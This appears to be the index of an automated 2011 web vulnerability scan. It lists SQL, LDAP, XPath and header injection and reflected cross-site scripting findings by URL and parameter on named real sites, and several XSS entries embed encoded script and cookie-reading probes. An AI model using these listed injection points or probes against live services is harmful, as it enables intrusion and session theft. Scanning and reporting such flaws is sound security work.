Report generated by CloudScan Vulnerability Crawler at Mon Jan 31 09:52:09 CST 2011.

1. SQL injection

1.1. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [TargetID parameter]

1.2. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [PG parameter]

1.3. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [sz parameter]

1.4. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]

1.5. http://amch.questionmarket.com/adsc/d852149/4/864449/decide.php [REST URL parameter 3]

1.6. http://assets.rubiconproject.com/static/rtb/sync-min.html [REST URL parameter 3]

1.7. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3]

1.8. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90 [id cookie]

1.9. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 1]

1.10. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 2]

1.11. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 3]

1.12. http://english.aljazeera.net/news/middleeast/2011/01/201113085252994161.html [REST URL parameter 4]

1.13. http://forums.silverlight.net/forums/topicsactive.aspx [Referer HTTP header]

1.14. http://forums.silverlight.net/user/viewonline.aspx [ASP.NET_SessionId cookie]

1.15. http://forums.silverlight.net/user/viewonline.aspx [Referer HTTP header]

1.16. http://forums.silverlight.net/user/viewonline.aspx [User-Agent HTTP header]

1.17. http://forums.silverlight.net/user/viewonline.aspx [name of an arbitrarily supplied request parameter]

1.18. http://forums.silverlight.net/user/viewonline.aspx [omniID cookie]

1.19. http://js.revsci.net/gateway/gw.js [REST URL parameter 2]

1.20. http://redacted/ [CC cookie]

1.21. http://redacted/ [s_sq cookie]

1.22. http://redacted/detail/stock_quote [ATC_ID cookie]

1.23. http://redacted/detail/stock_quote [Referer HTTP header]

1.24. http://redacted/detail/stock_quote [Sample cookie]

1.25. http://redacted/detail/stock_quote [expid cookie]

1.26. http://redacted/detail/stock_quote [name of an arbitrarily supplied request parameter]

1.27. http://redacted/inc/Attributions.asp [User-Agent HTTP header]

1.28. http://redacted/inc/Views/Shared/Core/Content/js/async/jasync.js [userCh cookie]

1.29. http://redacted/inc/Views/Shared/Core/Content/js/hotmaildata/getmaildata.js [s_sq cookie]

1.30. http://redacted/inc/Views/Shared/Core/Content/js/hotmaildata/unreadcount.js [CC cookie]

1.31. http://redacted/inc/Views/Shared/Core/Content/js/utilities/cookies.js [MC1 cookie]

1.32. http://redacted/inc/Views/Shared/Core/Content/js/utilities/cookies.js [MUID cookie]

1.33. http://redacted/inc/Views/Shared/Core/Content/js/utilities/getcookie.js [CULTURE cookie]

1.34. http://redacted/inc/Views/Shared/Core/Content/js/utilities/getcookie.js [v1st cookie]

1.35. http://redacted/inc/Views/Shared/Core/Content/js/utilities/stringutils.js [v1st cookie]

1.36. http://redacted/inc/Views/Shared/Core/Content/js/utility.js [SRCHHPGUSR cookie]

1.37. http://redacted/inc/css/ww.css [REST URL parameter 2]

1.38. http://redacted/inc/css/ww.css [User-Agent HTTP header]

1.39. http://redacted/inc/scr/ajaxquotes.js [Sample cookie]

1.40. http://redacted/inc/scr/userchoice.js [MC1 cookie]

1.41. http://redacted/inc/scr/userchoice.js [Referer HTTP header]

1.42. http://redacted/inc/scr/userchoice.js [__qca cookie]

1.43. http://redacted/inc/scr/ww.js [mh cookie]

1.44. http://redacted/investor/StockRating/srsmain.asp [name of an arbitrarily supplied request parameter]

1.45. http://redacted/investor/StockRating/srstopstocksresults.aspx [MUID cookie]

1.46. http://redacted/investor/StockRating/srstopstocksresults.aspx [expid cookie]

1.47. http://redacted/investor/StockRating/srstopstocksresults.aspx [v1st cookie]

1.48. http://redacted/investor/StockRating/srstopstocksresults.aspx [v1st cookie]

1.49. http://redacted/investor/charts/chartdl.aspx [Referer HTTP header]

1.50. http://redacted/investor/charts/chartdl.aspx [__qca cookie]

1.51. http://redacted/investor/charts/chartdl.aspx [expid cookie]

1.52. http://redacted/investor/charts/chartdl.aspx [v1st cookie]

1.53. http://redacted/investor/home.aspx [CC cookie]

1.54. http://redacted/investor/home.aspx [CULTURE cookie]

1.55. http://redacted/investor/home.aspx [User-Agent HTTP header]

1.56. http://redacted/investor/market/exchangerates.aspx [Referer HTTP header]

1.57. http://redacted/investor/market/exchangerates.aspx [Sample cookie]

1.58. http://redacted/investor/market/treasuries.aspx [REST URL parameter 1]

1.59. http://redacted/investor/market/treasuries.aspx [s_cc cookie]

1.60. http://redacted/investor/market/usindex.aspx [CC cookie]

1.61. http://redacted/investor/market/usindex.aspx [MC1 cookie]

1.62. http://redacted/investor/market/worldmarkets.aspx [CULTURE cookie]

1.63. http://redacted/investor/market/worldmarkets.aspx [Referer HTTP header]

1.64. http://redacted/investor/market/worldmarkets.aspx [expid cookie]

1.65. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [User-Agent HTTP header]

1.66. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [name of an arbitrarily supplied request parameter]

1.67. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [s parameter]

1.68. http://redacted/investor/partsub/funds/etfperformancetracker.aspx [s_cc cookie]

1.69. http://redacted/investor/portfolio-manager/portfolio.aspx [REST URL parameter 2]

1.70. http://redacted/investor/portfolio-manager/portfolio.aspx [userCh cookie]

1.71. http://redacted/money.search [MUID cookie]

1.72. http://redacted/money.search [User-Agent HTTP header]

1.73. http://redacted/money.search [name of an arbitrarily supplied request parameter]

1.74. http://recruiting.scout.com/a.z [c parameter]

1.75. http://recruiting.scout.com/a.z [pid parameter]

1.76. http://recruiting.scout.com/a.z [yr parameter]

1.77. http://technolog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]

1.78. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 2]

1.79. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 3]

1.80. http://technolog.msnbc.redacted/_news/2010/08/16/4904611-north-korea-welcome-to-twitter [REST URL parameter 4]

1.81. http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console [REST URL parameter 2]

1.82. http://technolog.msnbc.redacted/_news/2011/01/24/5907778-apple-calls-to-award-woman-10k-she-hangs-up [REST URL parameter 4]

1.83. http://technolog.msnbc.redacted/_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings [REST URL parameter 2]

1.84. http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see [REST URL parameter 2]

1.85. http://technolog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 2]

1.86. http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter]

1.87. http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter]

1.88. http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter]

1.89. http://technolog.msnbc.redacted/justin-bieber [name of an arbitrarily supplied request parameter]

1.90. http://technolog.msnbc.redacted/mark-zuckerberg [REST URL parameter 1]

1.91. http://technolog.msnbc.redacted/xbox [REST URL parameter 1]

1.92. http://technolog.msnbc.redacted/xbox [name of an arbitrarily supplied request parameter]

1.93. http://today.msnbc.redacted/id/41319614/ns/today-entertainment/ [REST URL parameter 2]

1.94. http://redcated/APM/iview/139941180/direct [name of an arbitrarily supplied request parameter]

1.95. http://redcated/APM/iview/148848786/direct [;wi.728;hi.90/01?click parameter]

1.96. http://redcated/APM/iview/148848786/direct [AA002 cookie]

1.97. http://redcated/APM/iview/148848786/direct [MUID cookie]

1.98. http://redcated/APM/iview/148848786/direct [MUID cookie]

1.99. http://redcated/APM/iview/148848786/direct [REST URL parameter 1]

1.100. http://redcated/APM/iview/148848786/direct [Referer HTTP header]

1.101. http://redcated/APM/iview/148848786/direct [Referer HTTP header]

1.102. http://www.bing.com/videos/browse [name of an arbitrarily supplied request parameter]

1.103. http://www.bing.com/videos/results.aspx [Referer HTTP header]

1.104. http://www.bing.com/videos/results.aspx [SRCHUID cookie]

1.105. http://www.bing.com/videos/results.aspx [User-Agent HTTP header]

1.106. http://www.bing.com/videos/results.aspx [User-Agent HTTP header]

1.107. http://www.msnbc.redacted/id/21134540/vp/41328239 [REST URL parameter 4]

1.108. http://www.msnbc.redacted/id/24780215/ns/technology_and_science-games [REST URL parameter 2]

1.109. http://www.msnbc.redacted/id/37643077 [REST URL parameter 2]

1.110. http://www.msnbc.redacted/id/37643077 [name of an arbitrarily supplied request parameter]

1.111. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [REST URL parameter 2]

1.112. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [REST URL parameter 4]

1.113. http://www.msnbc.redacted/id/41164445/ns/world_news-africa/ [name of an arbitrarily supplied request parameter]

1.114. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/ [REST URL parameter 3]

1.115. http://www.msnbc.redacted/id/41323843/ns/world_news-mideastn_africa/ [REST URL parameter 4]

1.116. http://www.msnbc.redacted/id/41324344/ns/world_news-south_and_central_asia/ [REST URL parameter 2]

1.117. http://www.msnbc.redacted/id/41326456/ns/business-media_biz/ [name of an arbitrarily supplied request parameter]

1.118. http://www.msnbc.redacted/id/41326705/ns/world_news-south_and_central_asia/ [name of an arbitrarily supplied request parameter]

1.119. http://www.msnbc.redacted/id/41327238/ns/us_news-crime_and_courts/ [REST URL parameter 3]

1.120. http://www.msnbc.redacted/id/41327817/ns/world_news-mideastn_africa/ [name of an arbitrarily supplied request parameter]

1.121. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/ [REST URL parameter 3]

1.122. http://www.msnbc.redacted/id/41327924/ns/world_news-europe/ [name of an arbitrarily supplied request parameter]

1.123. http://www.msnbc.redacted/id/41328059/ns/us_news/ [name of an arbitrarily supplied request parameter]

1.124. http://www.msnbc.redacted/id/41328834/ns/world_news-europe/ [REST URL parameter 3]

1.125. http://www.msnbc.redacted/id/41330515/ns/us_news-life/ [REST URL parameter 2]

1.126. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/ [REST URL parameter 1]

1.127. http://www.msnbc.redacted/id/41330876/ns/world_news-europe/ [name of an arbitrarily supplied request parameter]

1.128. http://www.msnbc.redacted/id/8004316/ [name of an arbitrarily supplied request parameter]

1.129. http://www.polls.newsvine.com/_nv/cms/help/faq [REST URL parameter 3]

1.130. http://www.polls.newsvine.com/_static/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css [REST URL parameter 1]

1.131. http://www.polls.newsvine.com/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css [REST URL parameter 1]

1.132. http://www.polls.newsvine.com/_vine/search [name of an arbitrarily supplied request parameter]

1.133. http://www.polls.newsvine.com/environment [name of an arbitrarily supplied request parameter]

1.134. http://www.popsci.com/ [name of an arbitrarily supplied request parameter]

2. LDAP injection

2.1. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 [TargetID parameter]

2.2. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [TargetID parameter]

2.3. http://ad.doubleclick.net/adi/N3382.no_url_specifiedOX2487/B5076164.5 [UIT parameter]

2.4. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]

2.5. http://ad.doubleclick.net/adj/N4478.redactedOX2487/B5084478.4 [AN parameter]

2.6. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 2]

2.7. http://click.pulse360.com/cgi-bin/clickthrough.cgi [creative parameter]

2.8. http://forums.silverlight.net/forums/53.aspx [ASP.NET_SessionId cookie]

2.9. http://login.live.com/login.srf [MUID cookie]

2.10. https://login.live.com/ppsecure/secure.srf [wla42 cookie]

2.11. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun [REST URL parameter 4]

2.12. http://photoblog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 3]

2.13. http://rad.redacted/ADSAdClient31.dll [GetSAd parameter]

2.14. http://technolog.msnbc.redacted/_news/2010/08/19/4932582-cameron-diaz-most-dangerous-celeb-search-name [REST URL parameter 2]

2.15. http://technolog.msnbc.redacted/_news/2010/08/24/4961720-yahoo-search-results-are-now-coming-from-bing- [REST URL parameter 4]

2.16. http://technolog.msnbc.redacted/_news/2010/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console [REST URL parameter 1]

2.17. http://technolog.msnbc.redacted/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink [REST URL parameter 5]

2.18. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ [REST URL parameter 1]

2.19. http://technolog.msnbc.redacted/_news/2011/01/28/5942663-t-pains-facebook-tattoo-so-hardcore-its-hexacore/ [REST URL parameter 5]

2.20. http://technolog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 3]

2.21. http://www.msnbc.redacted/id/32359544/ [REST URL parameter 1]

2.22. http://www.polls.newsvine.com/_nv/cms/help/faq [REST URL parameter 3]

2.23. http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy [REST URL parameter 1]

2.24. http://www.polls.newsvine.com/_static/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css [REST URL parameter 1]

2.25. http://www.polls.newsvine.com/_static/js/5bf8c8108bf4cc6d7732f39059de1eecc395f3a8.js [REST URL parameter 1]

2.26. http://www.polls.newsvine.com/_vine/js/pierre [REST URL parameter 2]

3. XPath injection

3.1. http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js [REST URL parameter 3]

3.2. http://ajax.microsoft.com/ajax/jQuery/jquery-1.4.2.min.js [REST URL parameter 3]

3.3. http://blogs.silverlight.net/ScriptResource.axd [d parameter]

3.4. http://blogs.silverlight.net/ScriptResource.axd [name of an arbitrarily supplied request parameter]

3.5. http://blogs.silverlight.net/ScriptResource.axd [t parameter]

3.6. http://entertainment.redacted/news/ [REST URL parameter 1]

3.7. http://entertainment.redacted/video/ [REST URL parameter 1]

3.8. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [Referer HTTP header]

3.9. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [User-Agent HTTP header]

3.10. http://msn.foxsports.com/cbk/story/Baylor-70-Colorado-66-30467175 [name of an arbitrarily supplied request parameter]

3.11. http://silverlight.codeplex.com/ [name of an arbitrarily supplied request parameter]

4. HTTP header injection

4.1. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php [ES cookie]

4.2. http://amch.questionmarket.com/adscgen/st.php [code parameter]

4.3. http://amch.questionmarket.com/adscgen/st.php [site parameter]

4.4. http://atl.whitepages.com/accipiter/adclick/CID=0000e5bbb2c762f700000000/AAMSZ=endemic_module/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/ [name of an arbitrarily supplied request parameter]

4.5. http://atl.whitepages.com/adclick/CID=0000e376b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter]

4.6. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate= [name of an arbitrarily supplied request parameter]

4.7. http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=/ [name of an arbitrarily supplied request parameter]

4.8. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 1]

4.9. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 2]

4.10. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [REST URL parameter 3]

4.11. http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link [name of an arbitrarily supplied request parameter]

4.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

4.13. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js [$ parameter]

4.14. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

4.15. http://redacted/home.asp [name of an arbitrarily supplied request parameter]

4.16. http://redacted/investor/home.aspx [name of an arbitrarily supplied request parameter]

5. Cross-site scripting (reflected)

5.1. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [&PID parameter]

5.2. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [AN parameter]

5.3. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [ASID parameter]

5.4. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [PG parameter]

5.5. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [TargetID parameter]

5.6. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [UIT parameter]

5.7. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [destination parameter]

5.8. http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8 [sz parameter]

5.9. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159 [TargetID parameter]

5.10. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [name of an arbitrarily supplied request parameter]

5.11. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383 [sz parameter]

5.12. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [&PID parameter]

5.13. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [AN parameter]

5.14. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [ASID parameter]

5.15. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [PG parameter]

5.16. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [PG parameter]

5.17. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [TargetID parameter]

5.18. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [UIT parameter]

5.19. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [destination parameter]

5.20. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [destination parameter]

5.21. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903 [sz parameter]

5.22. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [&PID parameter]

5.23. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [AN parameter]

5.24. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [ASID parameter]

5.25. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [PG parameter]

5.26. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [TargetID parameter]

5.27. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [UIT parameter]

5.28. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [destination parameter]

5.29. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4 [sz parameter]

5.30. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]

5.31. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]

5.32. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [&PID parameter]

5.33. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [AN parameter]

5.34. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [AN parameter]

5.35. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [ASID parameter]

5.36. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [ASID parameter]

5.37. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [PG parameter]

5.38. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]

5.39. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]

5.40. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [TargetID parameter]

5.41. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [UIT parameter]

5.42. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [UIT parameter]

5.43. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [destination parameter]

5.44. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [destination parameter]

5.45. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [sz parameter]

5.46. http://ad.doubleclick.net/adj/N2724.MSNDPM/B4753684.85 [sz parameter]

5.47. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [&PID parameter]

5.48. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [AN parameter]

5.49. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [ASID parameter]

5.50. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [PG parameter]

5.51. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [TargetID parameter]

5.52. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [UIT parameter]

5.53. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [destination parameter]

5.54. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [sz parameter]

5.55. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** [REST URL parameter 2]

5.56. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** [REST URL parameter 3]

5.57. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [REST URL parameter 2]

5.58. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [REST URL parameter 3]

5.59. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [click parameter]

5.60. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [name of an arbitrarily supplied request parameter]

5.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [&PID parameter]

5.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [AN parameter]

5.63. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [ASID parameter]

5.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [PG parameter]

5.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [REST URL parameter 2]

5.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [REST URL parameter 3]

5.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [TargetID parameter]

5.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [UIT parameter]

5.69. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [click parameter]

5.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [name of an arbitrarily supplied request parameter]

5.71. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [&PID parameter]

5.72. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [10,1,103;1920;1200;http%3A_@2F_@2Fredacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click parameter]

5.73. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [AN parameter]

5.74. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [ASID parameter]

5.75. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [PG parameter]

5.76. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [TargetID parameter]

5.77. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [UIT parameter]

5.78. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426** [name of an arbitrarily supplied request parameter]

5.79. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [&PID parameter]

5.80. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [10,1,103;1920;1200;http%3A_@2F_@2Fredacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balert1_@2F_@2F2badde9cef5?click parameter]

5.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [AN parameter]

5.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [ASID parameter]

5.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [PG parameter]

5.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [TargetID parameter]

5.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [UIT parameter]

5.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449** [name of an arbitrarily supplied request parameter]

5.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [&PID parameter]

5.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [AN parameter]

5.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [ASID parameter]

5.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [PG parameter]

5.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [REST URL parameter 2]

5.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [REST URL parameter 3]

5.93. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [TargetID parameter]

5.94. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [UIT parameter]

5.95. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [click parameter]

5.96. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1798982473 [name of an arbitrarily supplied request parameter]

5.97. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [&PID parameter]

5.98. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [10,1,103;1920;1200;http%3A_@2F_@2Fmoney.redacted_@2Finvesting_@3F4755d%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253E10ee24922f0%3D1?click parameter]

5.99. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [AN parameter]

5.100. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [ASID parameter]

5.101. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847** [PG parameter]

